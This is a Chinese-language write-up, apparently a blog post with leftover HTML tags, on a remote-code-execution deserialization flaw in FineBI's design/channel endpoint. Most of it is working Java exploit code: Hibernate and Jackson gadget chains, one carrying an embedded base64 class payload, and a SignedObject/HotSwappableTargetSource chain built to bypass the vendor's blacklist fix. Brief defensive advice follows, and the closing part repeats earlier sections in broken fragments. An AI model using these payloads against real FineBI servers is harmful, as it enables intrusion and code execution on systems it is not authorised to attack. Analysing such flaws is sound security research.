FineBI反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
FineBI是一款商业智能软件，其`\/webroot\/decision\/remote\/design\/channel<\/code>接口存在反序列化漏洞。该漏洞允许攻击者通过构造恶意的序列化数据实现远程代码执行。<\/p>`

漏洞分析<\/h2>
漏洞接口<\/h3>

接口路径：\/webroot\/decision\/remote\/design\/channel<\/code><\/li>
请求方式：POST<\/li>
<\/ul>
数据处理流程<\/h3>

接收POST传输的数据<\/li>
使用GZIPInputStream<\/code>解压缩GZIP格式数据<\/li>
使用CustomObjectInputStream<\/code>包装解压缩后的数据<\/li>
调用readObject()<\/code>方法进行反序列化<\/li>
<\/ol>
CustomObjectInputStream<\/code>继承自ObjectInputStream<\/code>，其构造方法调用父类的构造方法，与常规反序列化流程相同。<\/p>
漏洞利用<\/h2>
基本利用条件<\/h3>

构造的序列化数据需要先经过GZIP压缩<\/li>
然后向漏洞接口发送压缩后的数据<\/li>
<\/ul>
利用链选择<\/h3>
可以使用以下两种利用链：<\/p>
1. Hibernate链<\/h4>
import<\/span> com.fr.third.org.hibernate.engine.spi.TypedValue;<\/span>
<\/span><\/span>import<\/span> com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer;<\/span>
<\/span><\/span>import<\/span> com.fr.third.org.hibernate.type.Type;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Array;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Method;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Hibernate<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> getPayload<\/span>(<\/span>byte<\/span>[]<\/span> bytes)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class<?><\/span> componentTypeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.type.ComponentType"<\/span>);<\/span>
<\/span><\/span>        Class<?><\/span> pojoComponentTuplizerClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer"<\/span>);<\/span>
<\/span><\/span>        Class<?><\/span> abstractComponentTuplizerClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        TemplatesImpl tmpl =<\/span> utils.<\/span>getTeml<\/span>(<\/span>bytes);<\/span>
<\/span><\/span>        Method method =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"getOutputProperties"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Object getter;<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Class<?><\/span> getterImpl =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.property.access.spi.GetterMethodImpl"<\/span>);<\/span>
<\/span><\/span>            Constructor<?><\/span> constructor =<\/span> getterImpl.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>            constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            getter =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>null<\/span>,<\/span> null<\/span>,<\/span> method);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {<\/span>
<\/span><\/span>            Class<?><\/span> basicGetter =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.property.BasicPropertyAccessor$BasicGetter"<\/span>);<\/span>
<\/span><\/span>            Constructor<?><\/span> constructor =<\/span> basicGetter.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Method.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>            constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            getter =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>tmpl.<\/span>getClass<\/span>(),<\/span> method,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        Object getters =<\/span> Array.<\/span>newInstance<\/span>(<\/span>getter.<\/span>getClass<\/span>(),<\/span> 1<\/span>);<\/span>
<\/span><\/span>        Array.<\/span>set<\/span>(<\/span>getters,<\/span> 0<\/span>,<\/span> getter);<\/span>
<\/span><\/span>        
<\/span><\/span>        AbstractComponentTuplizer tuplizer =<\/span> (<\/span>AbstractComponentTuplizer)<\/span> utils.<\/span>createInstanceUnsafely<\/span>(<\/span>pojoComponentTuplizerClass);<\/span>
<\/span><\/span>        Field field =<\/span> abstractComponentTuplizerClass.<\/span>getDeclaredField<\/span>(<\/span>"getters"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>tuplizer,<\/span> getters);<\/span>
<\/span><\/span>        
<\/span><\/span>        Object type =<\/span> utils.<\/span>createInstanceUnsafely<\/span>(<\/span>componentTypeClass);<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>type,<\/span>"componentTuplizer"<\/span>,<\/span>tuplizer);<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>type,<\/span>"propertySpan"<\/span>,<\/span>1<\/span>);<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>type,<\/span>"propertyTypes"<\/span>,<\/span>new<\/span> Type[]{(<\/span>Type)<\/span> type});<\/span>
<\/span><\/span>        
<\/span><\/span>        TypedValue typedValue =<\/span> new<\/span> TypedValue((<\/span>Type)<\/span> type,<\/span> null<\/span>);<\/span>
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>typedValue,<\/span> "123"<\/span>);<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>typedValue,<\/span>"value"<\/span>,<\/span> tmpl);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> ser =<\/span> utils.<\/span>serialize<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> payload =<\/span> utils.<\/span>GzipCompress<\/span>(<\/span>ser);<\/span>
<\/span><\/span>        return<\/span> payload;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. CB链<\/h4>
也可以使用CommonsBeanutils链，但需要注意包名差异。<\/p>
绕过修复方案<\/h3>
官方修复方式增加了反序列化黑名单，禁止了CB、Hibernate等常用反序列化类，但未禁止Jackson相关类。<\/p>
Jackson利用链<\/h4>
import<\/span> util.utils;<\/span>
<\/span><\/span>import<\/span> com.fasterxml.jackson.databind.node.POJONode;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> javassist.ClassPool;<\/span>
<\/span><\/span>import<\/span> javassist.CtClass;<\/span>
<\/span><\/span>import<\/span> javassist.CtMethod;<\/span>
<\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span>
<\/span><\/span>import<\/span> java.util.Base64;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> jackson<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String calc =<\/span> "yv66vgAAADQANgoACQAlCgAmACcIACgKACYAKQcAKgcAKwoABgAsBwAtBwAuAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMdGVzdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKgEAClNvdXJjZUZpbGUBAAl0ZXN0LmphdmEMAAoACwcAMAwAMQAyAQAEY2FsYwwAMwA0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDAAKADUBAAR0ZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAJAA4AAAAMAAEAAAAFAA8AEAAAAAEAEQASAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAWAA4AAAAgAAMAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAFQAWAAIAFwAAAAQAAQAYAAEAEQAZAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAAbAA4AAAAqAAQAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAGgAbAAIAAAABABwAHQADABcAAAAEAAEAGAAIAB6ACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe\/sQABAAAACQAMAAUAAwANAAAAFgAFAAAADQAJABAADAAOAA0ADwAWABEADgAAAAwAAQANAAkAHwAgAAAAIQAAAAcAAkwHACIJAAEAIwAAAAIAJA=="<\/span>;<\/span>
<\/span><\/span>        TemplatesImpl t =<\/span> utils.<\/span>getTeml<\/span>(<\/span>Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>calc));<\/span>
<\/span><\/span>        
<\/span><\/span>        CtClass ctClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>get<\/span>(<\/span>"com.fasterxml.jackson.databind.node.BaseJsonNode"<\/span>);<\/span>
<\/span><\/span>        CtMethod writeReplace =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"writeReplace"<\/span>);<\/span>
<\/span><\/span>        ctClass.<\/span>removeMethod<\/span>(<\/span>writeReplace);<\/span>
<\/span><\/span>        ctClass.<\/span>toClass<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        POJONode node =<\/span> new<\/span> POJONode(<\/span>t);<\/span>
<\/span><\/span>        BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>val,<\/span>"val"<\/span>,<\/span>node);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> ser =<\/span> utils.<\/span>serialize<\/span>(<\/span>val);<\/span>
<\/span><\/span>        String b =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>ser);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>b);<\/span>
<\/span><\/span>        utils.<\/span>unserialize<\/span>(<\/span>ser);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>进一步绕过<\/h4>
当BadAttributeValueExpException<\/code>和TemplatesImpl<\/code>被加入黑名单后，可以使用以下替代方案：<\/p>

使用XString#equals<\/code>替代BadAttributeValueExpException<\/code>来触发toString方法<\/li>
在Spring环境下，利用HotSwappableTargetSource#equals<\/code>来触发XString<\/code>的equals方法<\/li>
使用SignedObject<\/code>替代TemplatesImpl<\/code>，利用其getObject<\/code>方法实现二次反序列化<\/li>
<\/ol>
import<\/span> com.fr.third.fasterxml.jackson.databind.node.POJONode;<\/span>
<\/span><\/span>import<\/span> com.fr.third.springframework.aop.target.HotSwappableTargetSource;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xpath.internal.objects.XString;<\/span>
<\/span><\/span>import<\/span> javassist.ClassPool;<\/span>
<\/span><\/span>import<\/span> javassist.CtClass;<\/span>
<\/span><\/span>import<\/span> javassist.CtMethod;<\/span>
<\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Array;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.security.SignedObject;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JacksonSignedObject<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> getPayload<\/span>(<\/span>byte<\/span>[]<\/span> bytes)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        TemplatesImpl t =<\/span> utils.<\/span>getTeml<\/span>(<\/span>bytes);<\/span>
<\/span><\/span>        
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            CtClass ctClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>get<\/span>(<\/span>"com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode"<\/span>);<\/span>
<\/span><\/span>            CtMethod writeReplace =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"writeReplace"<\/span>);<\/span>
<\/span><\/span>            ctClass.<\/span>removeMethod<\/span>(<\/span>writeReplace);<\/span>
<\/span><\/span>            ctClass.<\/span>toClass<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e){<\/span> }<\/span>
<\/span><\/span>        
<\/span><\/span>        POJONode node =<\/span> new<\/span> POJONode(<\/span>utils.<\/span>makeTemplatesImplAopProxy<\/span>(<\/span>t));<\/span>
<\/span><\/span>        BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>val,<\/span>"val"<\/span>,<\/span>node);<\/span>
<\/span><\/span>        
<\/span><\/span>        SignedObject s =<\/span> utils.<\/span>makeSignedObject<\/span>(<\/span>val);<\/span>
<\/span><\/span>        POJONode node2 =<\/span> new<\/span> POJONode(<\/span>s);<\/span>
<\/span><\/span>        
<\/span><\/span>        HotSwappableTargetSource h1 =<\/span> new<\/span> HotSwappableTargetSource(<\/span>node2);<\/span>
<\/span><\/span>        HotSwappableTargetSource h2 =<\/span> new<\/span> HotSwappableTargetSource(<\/span>new<\/span> XString(<\/span>"xxx"<\/span>));<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashmap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>hashmap,<\/span> "size"<\/span>,<\/span> 2<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> nodeC;<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            nodeC =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.util.HashMap$Node"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span> ClassNotFoundException e )<\/span> {<\/span>
<\/span><\/span>            nodeC =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.util.HashMap$Entry"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        Constructor<?><\/span> nodeCons =<\/span> nodeC.<\/span>getDeclaredConstructor<\/span>(<\/span>int<\/span>.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> nodeC);<\/span>
<\/span><\/span>        nodeCons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Object tbl =<\/span> Array.<\/span>newInstance<\/span>(<\/span>nodeC,<\/span> 2<\/span>);<\/span>
<\/span><\/span>        Array.<\/span>set<\/span>(<\/span>tbl,<\/span> 0<\/span>,<\/span> nodeCons.<\/span>newInstance<\/span>(<\/span>0<\/span>,<\/span> h1,<\/span> h1,<\/span> null<\/span>));<\/span>
<\/span><\/span>        Array.<\/span>set<\/span>(<\/span>tbl,<\/span> 1<\/span>,<\/span> nodeCons.<\/span>newInstance<\/span>(<\/span>0<\/span>,<\/span> h2,<\/span> h2,<\/span> null<\/span>));<\/span>
<\/span><\/span>        
<\/span><\/span>        utils.<\/span>setFieldValue<\/span>(<\/span>hashmap,<\/span> "table"<\/span>,<\/span> tbl);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> ser =<\/span> utils.<\/span>serialize<\/span>(<\/span>hashmap);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> payload =<\/span> utils.<\/span>GzipCompress<\/span>(<\/span>ser);<\/span>
<\/span><\/span>        return<\/span> payload;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级到最新版本<\/li>
限制反序列化类白名单<\/li>
对输入数据进行严格校验<\/li>
禁用不必要的远程接口<\/li>
<\/ol>
总结<\/h2>
FineBI反序列化漏洞是一个典型的Java反序列化安全问题，攻击者可以通过构造特定的序列化数据实现远程代码执行。随着防御措施的加强，攻击者也不断寻找新的利用链进行绕过。开发者应当持续关注安全更新，及时修补漏洞。<\/p>
FineBI反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2> FineBI是一款商业智能软件，其\/webroot\/decision\/remote\/design\/channel<\/code>接口存在反序列化漏洞。该漏洞允许攻击者通过构造恶意的序列化数据实现远程代码执行。<\/p>

利用链选择<\/h3> 可以使用以下两种利用链：<\/p>

2. CB链<\/h4> 也可以使用CommonsBeanutils链，但需要注意包名差异。<\/p>

绕过修复方案<\/h3> 官方修复方式增加了反序列化黑名单，禁止了CB、Hibernate等常用反序列化类，但未禁止Jackson相关类。<\/p>

漏洞概述<\/h2>
FineBI是一款商业智能软件，其`\/webroot\/decision\/remote\/design\/channel<\/code>接口存在反序列化漏洞。该漏洞允许攻击者通过构造恶意的序列化数据实现远程代码执行。<\/p>`

利用链选择<\/h3>
可以使用以下两种利用链：<\/p>

2. CB链<\/h4>
也可以使用CommonsBeanutils链，但需要注意包名差异。<\/p>

绕过修复方案<\/h3>
官方修复方式增加了反序列化黑名单，禁止了CB、Hibernate等常用反序列化类，但未禁止Jackson相关类。<\/p>
